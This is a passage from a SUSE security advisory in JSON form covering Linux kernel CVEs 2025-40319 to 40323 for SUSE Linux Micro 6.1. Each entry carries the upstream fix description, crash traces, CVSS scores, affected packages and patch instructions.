"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40319",
"url": "https://www.suse.com/security/cve/CVE-2025-40319"
},
{
"category": "external",
"summary": "SUSE Bug 1254794 for CVE-2025-40319",
"url": "https://bugzilla.suse.com/1254794"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40319"
},
{
"cve": "CVE-2025-40320",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40320"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nsmb: client: fix potential cfid UAF in smb2_query_info_compound\n\nWhen smb2_query_info_compound() retries, a previously allocated cfid may\nhave been freed in the first attempt.\nBecause cfid wasn\u0027t reset on replay, later cleanup could act on a stale\npointer, leading to a potential use-after-free.\n\nReinitialize cfid to NULL under the replay label.\n\nExample trace (trimmed):\n\nrefcount_t: underflow; use-after-free.\nWARNING: CPU: 1 PID: 11224 at ../lib/refcount.c:28 refcount_warn_saturate+0x9c/0x110\n[...]\nRIP: 0010:refcount_warn_saturate+0x9c/0x110\n[...]\nCall Trace:\n \u003cTASK\u003e\n smb2_query_info_compound+0x29c/0x5c0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n ? step_into+0x10d/0x690\n ? __legitimize_path+0x28/0x60\n smb2_queryfs+0x6a/0xf0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n smb311_queryfs+0x12d/0x140 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n ? kmem_cache_alloc+0x18a/0x340\n ? getname_flags+0x46/0x1e0\n cifs_statfs+0x9f/0x2b0 [cifs f90b72658819bd21c94769b6a652029a07a7172f]\n statfs_by_dentry+0x67/0x90\n vfs_statfs+0x16/0xd0\n user_statfs+0x54/0xa0\n __do_sys_statfs+0x20/0x50\n do_syscall_64+0x58/0x80",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40320",
"url": "https://www.suse.com/security/cve/CVE-2025-40320"
},
{
"category": "external",
"summary": "SUSE Bug 1254793 for CVE-2025-40320",
"url": "https://bugzilla.suse.com/1254793"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40320"
},
{
"cve": "CVE-2025-40321",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40321"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: brcmfmac: fix crash while sending Action Frames in standalone AP Mode\n\nCurrently, whenever there is a need to transmit an Action frame,\nthe brcmfmac driver always uses the P2P vif to send the \"actframe\" IOVAR to\nfirmware. The P2P interfaces were available when wpa_supplicant is managing\nthe wlan interface.\n\nHowever, the P2P interfaces are not created/initialized when only hostapd\nis managing the wlan interface. And if hostapd receives an ANQP Query REQ\nAction frame even from an un-associated STA, the brcmfmac driver tries\nto use an uninitialized P2P vif pointer for sending the IOVAR to firmware.\nThis NULL pointer dereferencing triggers a driver crash.\n\n [ 1417.074538] Unable to handle kernel NULL pointer dereference at virtual\n address 0000000000000000\n [...]\n [ 1417.075188] Hardware name: Raspberry Pi 4 Model B Rev 1.5 (DT)\n [...]\n [ 1417.075653] Call trace:\n [ 1417.075662] brcmf_p2p_send_action_frame+0x23c/0xc58 [brcmfmac]\n [ 1417.075738] brcmf_cfg80211_mgmt_tx+0x304/0x5c0 [brcmfmac]\n [ 1417.075810] cfg80211_mlme_mgmt_tx+0x1b0/0x428 [cfg80211]\n [ 1417.076067] nl80211_tx_mgmt+0x238/0x388 [cfg80211]\n [ 1417.076281] genl_family_rcv_msg_doit+0xe0/0x158\n [ 1417.076302] genl_rcv_msg+0x220/0x2a0\n [ 1417.076317] netlink_rcv_skb+0x68/0x140\n [ 1417.076330] genl_rcv+0x40/0x60\n [ 1417.076343] netlink_unicast+0x330/0x3b8\n [ 1417.076357] netlink_sendmsg+0x19c/0x3f8\n [ 1417.076370] __sock_sendmsg+0x64/0xc0\n [ 1417.076391] ____sys_sendmsg+0x268/0x2a0\n [ 1417.076408] ___sys_sendmsg+0xb8/0x118\n [ 1417.076427] __sys_sendmsg+0x90/0xf8\n [ 1417.076445] __arm64_sys_sendmsg+0x2c/0x40\n [ 1417.076465] invoke_syscall+0x50/0x120\n [ 1417.076486] el0_svc_common.constprop.0+0x48/0xf0\n [ 1417.076506] do_el0_svc+0x24/0x38\n [ 1417.076525] el0_svc+0x30/0x100\n [ 1417.076548] el0t_64_sync_handler+0x100/0x130\n [ 1417.076569] el0t_64_sync+0x190/0x198\n [ 1417.076589] Code: f9401e80 aa1603e2 f9403be1 5280e483 (f9400000)\n\nFix this, by always using the vif corresponding to the wdev on which the\nAction frame Transmission request was initiated by the userspace. This way,\neven if P2P vif is not available, the IOVAR is sent to firmware on AP vif\nand the ANQP Query RESP Action frame is transmitted without crashing the\ndriver.\n\nMove init_completion() for \"send_af_done\" from brcmf_p2p_create_p2pdev()\nto brcmf_p2p_attach(). Because the former function would not get executed\nwhen only hostapd is managing wlan interface, and it is not safe to do\nreinit_completion() later in brcmf_p2p_tx_action_frame(), without any prior\ninit_completion().\n\nAnd in the brcmf_p2p_tx_action_frame() function, the condition check for\nP2P Presence response frame is not needed, since the wpa_supplicant is\nproperly sending the P2P Presense Response frame on the P2P-GO vif instead\nof the P2P-Device vif.\n\n[Cc stable]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40321",
"url": "https://www.suse.com/security/cve/CVE-2025-40321"
},
{
"category": "external",
"summary": "SUSE Bug 1254795 for CVE-2025-40321",
"url": "https://bugzilla.suse.com/1254795"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40321"
},
{
"cve": "CVE-2025-40322",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40322"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbdev: bitblit: bound-check glyph index in bit_putcs*\n\nbit_putcs_aligned()/unaligned() derived the glyph pointer from the\ncharacter value masked by 0xff/0x1ff, which may exceed the actual font\u0027s\nglyph count and read past the end of the built-in font array.\nClamp the index to the actual glyph count before computing the address.\n\nThis fixes a global out-of-bounds read reported by syzbot.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40322",
"url": "https://www.suse.com/security/cve/CVE-2025-40322"
},
{
"category": "external",
"summary": "SUSE Bug 1255092 for CVE-2025-40322",
"url": "https://bugzilla.suse.com/1255092"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-40322"
},
{
"cve": "CVE-2025-40323",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40323"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfbcon: Set fb_display[i]-\u003emode to NULL when the mode is released\n\nRecently, we discovered the following issue through syzkaller:\n\nBUG: KASAN: slab-use-after-free in fb_mode_is_equal+0x285/0x2f0\nRead of size 4 at addr ff11000001b3c69c by task syz.xxx\n...\nCall Trace:\n \u003cTASK\u003e\n dump_stack_lvl+0xab/0xe0\n print_address_description.constprop.0+0x2c/0x390\n print_report+0xb9/0x280\n kasan_report+0xb8/0xf0\n fb_mode_is_equal+0x285/0x2f0\n fbcon_mode_deleted+0x129/0x180\n fb_set_var+0xe7f/0x11d0\n do_fb_ioctl+0x6a0/0x750\n fb_ioctl+0xe0/0x140\n __x64_sys_ioctl+0x193/0x210\n do_syscall_64+0x5f/0x9c0\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\nBased on experimentation and analysis, during framebuffer unregistration,\nonly the memory of fb_info-\u003emodelist is freed, without setting the\ncorresponding fb_display[i]-\u003emode to NULL for the freed modes. This leads\nto UAF issues during subsequent accesses. Here\u0027s an example of reproduction\nsteps:\n1. With /dev/fb0 already registered in the system, load a kernel module\n to register a new device /dev/fb1;\n2. Set fb1\u0027s mode to the global fb_display[] array (via FBIOPUT_CON2FBMAP);\n3. Switch console from fb to VGA (to allow normal rmmod of the ko);\n4. Unload the kernel module, at this point fb1\u0027s modelist is freed, leaving\n a wild pointer in fb_display[];\n5. Trigger the bug via system calls through fb0 attempting to delete a mode\n from fb0.\n\nAdd a check in do_unregister_framebuffer(): if the mode to be freed exists\nin fb_display[], set the corresponding mode pointer to NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40323",
"url": "https://www.suse.com/security/cve/CVE-2025-40323"
},
{
"category": "external",
"summary": "SUSE Bug 1255094 for CVE-2025-40323",
"url": "https://bugzilla.suse.com/1255094"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
